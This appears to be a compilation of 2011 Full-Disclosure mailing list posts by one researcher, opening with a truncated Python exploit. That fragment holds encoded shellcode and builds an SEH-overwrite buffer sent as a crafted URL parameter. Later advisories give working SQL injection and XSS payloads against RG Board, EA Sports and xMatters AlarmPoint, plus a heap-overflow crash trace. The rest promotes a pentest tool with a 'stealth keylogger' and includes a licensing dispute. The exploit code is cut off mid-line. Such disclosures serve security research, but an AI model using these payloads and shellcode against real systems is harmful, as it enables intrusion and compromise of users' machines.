\x4e\x30\x56\x30\x4c\x4b\x50\x48\x54\x58\x4c\x4b\x56\x38\x51
\x30\x45\x51\x58\x53\x5a\x43\x47\x4c\x51\x59\x4c\x4b\x56\x54
\x4c\x4b\x45\x51\x49\x46\x50\x31\x4b\x4f\x50\x31\x49\x50\x4e
\x4c\x49\x51\x58\x4f\x54\x4d\x45\x51\x58\x47\x56\x58\x4d\x30
\x54\x35\x5a\x54\x54\x43\x43\x4d\x4b\x48\x47\x4b\x43\x4d\x47
\x54\x52\x55\x4d\x32\x50\x58\x4c\x4b\x51\x48\x51\x34\x43\x31
\x4e\x33\x43\x56\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x56\x38\x45
\x4c\x45\x51\x58\x53\x4c\x4b\x43\x34\x4c\x4b\x45\x51\x4e\x30
\x4c\x49\x50\x44\x56\x44\x56\x44\x51\x4b\x51\x4b\x45\x31\x51
\x49\x50\x5a\x50\x51\x4b\x4f\x4d\x30\x56\x38\x51\x4f\x50\x5a
\x4c\x4b\x54\x52\x5a\x4b\x4b\x36\x51\x4d\x52\x48\x56\x53\x47
\x42\x43\x30\x45\x50\x43\x58\x43\x47\x43\x43\x47\x42\x51\x4f
\x56\x34\x52\x48\x50\x4c\x52\x57\x56\x46\x45\x57\x4b\x4f\x4e
\x35\x4e\x58\x5a\x30\x45\x51\x43\x30\x45\x50\x51\x39\x4f\x34
\x51\x44\x56\x30\x52\x48\x51\x39\x4d\x50\x52\x4b\x45\x50\x4b
\x4f\x4e\x35\x56\x30\x56\x30\x50\x50\x50\x50\x47\x30\x50\x50
\x47\x30\x50\x50\x52\x48\x5a\x4a\x54\x4f\x49\x4f\x4d\x30\x4b
\x4f\x49\x45\x4d\x59\x58\x47\x50\x31\x49\x4b\x56\x33\x52\x48
\x43\x32\x43\x30\x54\x51\x51\x4c\x4b\x39\x4d\x36\x43\x5a\x54
\x50\x56\x36\x50\x57\x52\x48\x49\x52\x49\x4b\x56\x57\x43\x57
\x4b\x4f\x58\x55\x50\x53\x56\x37\x52\x48\x4f\x47\x4b\x59\x50
\x38\x4b\x4f\x4b\x4f\x49\x45\x51\x43\x51\x43\x51\x47\x43\x58
\x43\x44\x5a\x4c\x47\x4b\x4b\x51\x4b\x4f\x49\x45\x51\x47\x4c
\x49\x4f\x37\x52\x48\x52\x55\x52\x4e\x50\x4d\x45\x31\x4b\x4f
\x4e\x35\x45\x38\x45\x33\x52\x4d\x45\x34\x45\x50\x4c\x49\x5a
\x43\x51\x47\x51\x47\x51\x47\x50\x31\x5a\x56\x52\x4a\x45\x42
\x51\x49\x56\x36\x4d\x32\x4b\x4d\x45\x36\x4f\x37\x51\x54\x51
\x34\x47\x4c\x43\x31\x43\x31\x4c\x4d\x47\x34\x56\x44\x54\x50
\x49\x56\x45\x50\x51\x54\x51\x44\x50\x50\x50\x56\x56\x36\x56
\x36\x47\x36\x51\x46\x50\x4e\x51\x46\x50\x56\x56\x33\x51\x46
\x43\x58\x52\x59\x58\x4c\x47\x4f\x4c\x46\x4b\x4f\x58\x55\x4c
\x49\x4b\x50\x50\x4e\x51\x46\x47\x36\x4b\x4f\x56\x50\x45\x38
\x54\x48\x4d\x57\x45\x4d\x43\x50\x4b\x4f\x49\x45\x4f\x4b\x4b
\x4e\x54\x4e\x50\x32\x4b\x5a\x52\x48\x4e\x46\x4c\x55\x4f\x4d
\x4d\x4d\x4b\x4f\x4e\x35\x47\x4c\x54\x46\x43\x4c\x45\x5a\x4b
\x30\x4b\x4b\x4b\x50\x54\x35\x43\x35\x4f\x4b\x47\x37\x45\x43
\x52\x52\x52\x4f\x43\x5a\x45\x50\x51\x43\x4b\x4f\x4e\x35\x41
\x41)
ShellCodePort =
CraftedBuffer = Junk + nSEH + SEH + ShellCode
vulnerableURL = '/chat.ghp?username=' + CraftedBuffer +
'password=nullroom=1null=2'
Connection = httplib.HTTPConnection(Host, Port)
Connection.request('GET', vulnerableURL
[Full-disclosure] [Security Tool - Video] INSECT Pro 2.6.1 available
INSECT Pro 2.6.1 is worldwide available right now Check the new cool features: http://www.youtube.com/watch?v=EcgPMyjHVbQ * Run Faster: Because to make a good security testing is not enough * Load Better: Major graphical interface and optimisation features were implemented * Module Search: This version includes a new built-in search feature * Improvements and Changes: Many more optimisations and updates were added * Lots of bugs were patched Start here: http://www.insecurityresearch.com Regards Juan Sacco -- _ Insecurity Research - Security auditing and testing software Web: http://www.insecurityresearch.com Insect Pro 2.6.1 was released stay tunned ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] INSECT Pro - Advisory 2011 0628 - SQL Injection - XSS - RGBoard 2.2
Information Name : SQL Injection and XSS discovered Software : RG Board 2.2 Vendor Homepage : http://www.rgboard.com/ Vulnerability Type : SQL injection and XSS reflected Severity : High Researcher : Juan Sacco jsacco [at] insecurityresearch [dot] com Description -- RG Board 2.2 is prone to a SQL Injection and XSS reflected vulnerabilitys because the application fails to properly perform adequate boundary checks on user-supplied data. An attacker can exploit this issue to compromise the victim's machine. Details --- SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application (like queries). Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables attackers to inject client-side script into web pages viewed by other users. Exploit example as follow - SQL Injection: http://target.com/main/view.php?bbs_code=[injectme]bd_num=106kw=ss[sc]=1ss[st]=1 This vulnerability affects /main/view.php using method GET XSS: http://target.com/main/list.php?bbs_code=newspage=1%3cScRiPt%20%3ealert%28/XSS/%29%3c%2fScRiPt%3e The vulnerability is caused by the following code: form id=category_form action=? method=get enctype=multipart/form-data p id=ba_content_list_topinput type=hidden name=bbs_code value=news / span class=floating_leftCategory: select name=ss[cat] onchange=this.form.submit(); option value=All/option option value=7News/option option value=8PR/option option value=9Video/option /select/span span class=floating_rightTotal : 47 (1ScRiPt alert(/XSS/)/ScRiPt/3)/span/p /form Solution --- No patch are available at this time. Credits --- Manual discovered by Insecurity Research Labs Juan Sacco - http://www.insecurityresearch.com -- _ Insecurity Research - Security auditing and testing software Web: http://www.insecurityresearch.com Insect Pro 2.6.1 was released stay tunned ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [New Security Tool] INSECT Pro 2.6.1 release
Test your network security and audit your website using the same tools as hackers. INSECT Pro 2.6.1 is available for purchase right now worldwide through PayPal! * Run Faster: You not only want to make great security testing, you want a nice performance * Load Better: Major graphical interface and optimizations features * Module Search: Ever wondered where that module? We have a built-in search feature for you * Improvements, and Changes As always, we've added a lot of other features and optimizations * The latest exploits found in the wild We are always trying to be one step ahead of the competition, take a visual tour of some of INSECT Pro most popular features and discover INSECT Pro today! Start here: http://www.insecurityresearch.com Regards Juan Sacco -- Insecurity Research - Security auditing and testing software Web: http://www.insecurityresearch.com INSECT Pro 2.6.1 on track - Stay tunned ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] INSECT Pro - Advisory 2011 0620 - Zero Day - XSS Persistent in EA Sports
Information Name : XSS Persistent in EA Sports Software : EA Sports Main site Vendor Homepage : http://www.ea.com Vulnerability Type : XSS Persistent Severity : Very High Researcher : Juan Sacco jsacco [at] insecurityresearch [dot] com Description -- EA Sports is prone to a XSS Stored vulnerability because the application fails to properly perform adequate boundary checks on user-supplied data. An attacker can exploit this issue to execute arbitrary code in the victim's machine. Details --- The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on normal pages returned to other users in the course of regular browsing, without proper HTML escaping. A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read Exploit example as follow - Vulnerable web site http://www.ea.com/soccer/profile/biography/cem_ea_id/jsacco123 The vulnerability is caused by the following code and affected by the Hometown input li label class=sectionHome Town:/label 'gt;script xml:space=preservealert(XSS discovered by INSECT Pro)/script /li li Solution --- No patch are available at this time. Credits --- Manual discovered by Insecurity Research Labs Juan Sacco - http://www.insecurityresearch.com -- _ Insecurity Research - Security auditing and testing software Web: http://www.insecurityresearch.com Insect Pro 2.6.1 was released stay tunned ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security Tool] INSECT Pro 2.6.1 is here
INSECT Pro 2.6.1 is here! This penetration security auditing and testing software solution is designed to allow organizations of all sizes mitigate, monitor and manage the latest security threats vulnerabilities and implement active security policies by performing penetration tests across their infrastructure and applications. * Run Faster: You not only want to make great security testing, you want screaming performance * Load Better: Major graphical intergace and optimizations features that we implemented * Module Search: Ever wondered where that module? We have a built-in search feature for your project * Improvements, and Changes As always, we've added a slew of other features and optimizations When is 2.6.1 available? INSECT Pro 2.6.1 is available for purchase right now via PayPal! We are always trying to be one step ahead of the competition, take a visual tour of some of INSECT Pro most popular features and discover why INSECT Pro has become a leader in security software and solutions around the globe. Start your tour here: http://www.insecurityresearch.com Regards Juan Sacco -- Insecurity Research - Security auditing and testing software Web: http://www.insecurityresearch.com INSECT Pro 2.6.1 on track - Stay tunned ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Insect Pro - Advisory 2011 0427 Persistent Cross-Site Scripting (XSS) in xMatters AlarmPoint
Information Name : XSS Persistent vulnerability in xMatters AlarmPoint Java Web Server API Software : xMatters AlarmPoint Vendor Homepage : http://www.xmatters.com Vulnerability Type : Cross-Site Scripting Severity : High Researcher : Juan Sacco jsacco [at] insecurityresearch [dot] com Description -- The AlarmPoint Java Server consists of a collection of software components and software APIs designed to provide a flexible and powerful set of tools for integrating various applications to AlarmPoint. Details --- AlarmPoint Java Web Server API is affected by a Persistent XSS vulnerability in version 3.2.1 Exploit as follow: Insert new HTTP API with the following malicious code: ?xml version=1.0? transaction version=1.0 header methodAlive/method /header data agent_client_idping/agent_client_id /data /transaction'scriptalert(/XSS/)/script Go to: http://example.com:2010/agent/status.html Reponse: AgentStatus 3.2.1 (Build 23894/20071210175331)ea-cad0f2c429ee/192.168.72.128Unavailable192.168.72.128:2004115'scriptalert(/XSS/)/script Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29 Solution --- No patch are available at this time. Credits --- Manual discovered by Insecurity Research Labs Juan Sacco - http://www.insecurityresearch.com -- -- _ Insecurity Research - Security auditing and testing software Web: http://www.insecurityresearch.com Insect Pro 2.5 was released stay tunned ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Insect Pro - Advisory 2011 0428 - Zero Day - Heap Buffer Overflow in xMatters APClient
Information Name : Heap Buffer Overflow in xMatters AlarmPoint APClient Version: APClient 3.2.0 (native) Software : xMatters AlarmPoint Vendor Homepage : http://www.xmatters.com Vulnerability Type : Heap Buffer Overflow Md5: 283d98063323f35deb7afbd1db93d859 APClient.bin Severity : High Researcher : Juan Sacco jsacco [at] insecurityresearch [dot] com Description -- The AlarmPoint Java Server consists of a collection of software components and software APIs designed to provide a flexible and powerful set of tools for integrating various applications to AlarmPoint. Details --- AlarmPoint APClient is affected by a Heap Overflow vulnerability in version APClient 3.2.0 (native) A heap overflow condition is a buffer overflow, where the buffer that can be overwritten is allocated in the heap portion of memory, generally meaning that the buffer was allocated using a routine such as the POSIX malloc() call. https://www.owasp.org/index.php/Heap_overflow Exploit as follow: Submit a malicious file cointaining the exploit root@ea-gateway:/opt/alarmpointsystems/integrationagent/bin$ ./APClient.bin --submit-file maliciousfile.hex or (gdb) run `python -c 'print \x90*16287'` Starting program: /opt/alarmpointsystems/integrationagent/bin/APClient.bin `python -c 'print \x90*16287'` Program received signal SIGSEGV, Segmentation fault. 0x0804be8a in free () (gdb) i r eax0xa303924170932516 ecx0xbfb8 49080 edx0xa303924170932516 ebx0x8059438134583352 esp0xbfff3620 0xbfff3620 ebp0xbfff3638 0xbfff3638 esi0x8059440134583360 edi0x80653f0134632432 eip0x804be8a0x804be8a free+126 eflags 0x210206 [ PF IF RF ID ] cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51 (gdb) Solution --- No patch are available at this time. Credits --- Manual discovered by Insecurity Research Labs Juan Sacco - http://www.insecurityresearch.com -- -- _ Insecurity Research - Security auditing and testing software Web: http://www.insecurityresearch.com Insect Pro 2.5 was released stay tunned ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Insect Pro 2.1 : New version release
The Insect Pro 2.1 new version is now accessible on Insecurity Research servers! Get it now to enjoy the positive changes that this update brings, based directly on user feedback Insect Pro is a penetration security auditing and testing software solution designed to allow organizations of all sizes mitigate, monitor and manage the latest security threats vulnerabilities and implement active security policies by performing penetration tests across their infrastructure and applications. Insect Pro 2.1 includes: Minimize to systray to work in background Video recording Capture screenshots Keylogging feature Command-line based control GUI improved Read full patch notes on our site to learn more about what's new and improved. Also, anyone that has not yet donate to get a license may do it now and obtain a free version of the new stealth keylogger! Juan Sacco -- _ Insecurity Research - Security auditing and testing software Web: http://www.insecurityresearch.com Insect Pro 2.1 was released stay tunned ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [VIDEO] Keylogger, RecordMic and Shell
Hey Steve, Thanks for your time. Probably this tool is not meant for you, since you use metasploit, I wasnt trying to reinvent the wheel, This tool is oriented to people with basic security skills, that need a way to do pentest to their sites among many other possibilities. Thanks again, dont forget to donate because you didnt But Im ok with that :-) Juan Sacco On Wed, Jan 26, 2011 at 3:33 PM, Steve Pinkham steve.pink...@gmail.comwrote: On 01/26/2011 01:25 PM, Juan Sacco wrote: Steve, is a lot easier get donation and rent a good hosting. Sorry Im going to pass your offer. Juan Sacco Sure, I understand. Unfortunately, that puts you back in the liar catagory about whether or not the software is actually free. Too bad, I just wasted 20 bucks and a few hours setting up quality hosting, and I was looking forward to trying out a new tool. Back to metasploit for me! -- | Steven Pinkham, Security Consultant| | http://www.mavensecurity.com | | GPG public key ID CD31CAFB | -- _ Insecurity Research - Security auditing and testing software Web: http://www.insecurityresearch.com Insect Pro 2.0 was released stay tunned ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [VIDEO] Keylogger, RecordMic and Shell
Hi, Troll Thanks for your review :-) It's a pity that the tools you refer cost from $5000 to $3 usd INSECT Pro is a tool for penetration testing that we'd created based on the free classes we gave here in Argentina, listening to all the obstacles people had using tools that we love like metasploit. BTW: We love meterpreter, that's why we use it of course. What's your problem using it? Don't you know how to use it? INSECT PRO 2.0 is free, we only ask for a minimum donation to maintain the ftp and the web-site online. Juan Sacco -- _ Insecurity Research - Security auditing and testing software Web: http://www.insecurityresearch.com Insect Pro 2.0 was released stay tunned On Tue, Jan 25, 2011 at 7:45 PM, R0me0 *** knight@gmail.com wrote: I think that this tool is a BIG bullshit, and only serves to noobs and lammers, and too exists others tools that deserve respect SAINT, CORE IMPACT and other and of course ! THE METASPLOIT FRAMEWORK ( U use the meterpreter in your tool) Regards, spawn 2011/1/25 Roger rno...@gmail.com Too late. I already sent that information to the FBI for prime factorisation. -r ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [VIDEO] Keylogger, RecordMic and Shell
Steve, yes you can! :-) Let me know by email when you are ready! and I hope you could make a personal review of Insect Pro 2.0 when you get a copy :P BTW I will change that word licence is consufing i guess, Thanks for support our software Juan Sacco -- _ Insecurity Research - Security auditing and testing software Web: http://www.insecurityresearch.com Insect Pro 2.0 was released stay tunned On Wed, Jan 26, 2011 at 1:27 AM, Steve Pinkham steve.pink...@gmail.comwrote: On 01/25/2011 10:06 PM, runlvl wrote: From our download section: http://www.insecurityresearch.com/?page_id=926 make a donation of minimum: $20 ( US Dollars ) This helps us to maintain Insect Pro and the whole site! Steve, Im sorry, we cant afford the proyect ( ftp bandwich and http server ), luckily a lot of people are trusting on us, so we can continue with this tool. Thumbs up! :-) Juan Sacco I repeat: If I'm just paying for download access, can I pay $20, download it, then host if for others to download for free. If not, it's paying for licensing, not download bandwidth. Also, I repeat, YOUR OWN SITE says you are paying for a license, not download access. Quote from the page we both linked to: After you make the donation please write us an email to don...@insecurityresearch.com with your full name and we will send you the user and password for your new license. Put up or shut up time: I will pay to host the download on my own server for the next 6 months if the product license allows it(and it legal for me to do so as not infringing copyright, etc), or you need to stop claiming it is free. So, can I redistribute it for free, or are you a liar? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
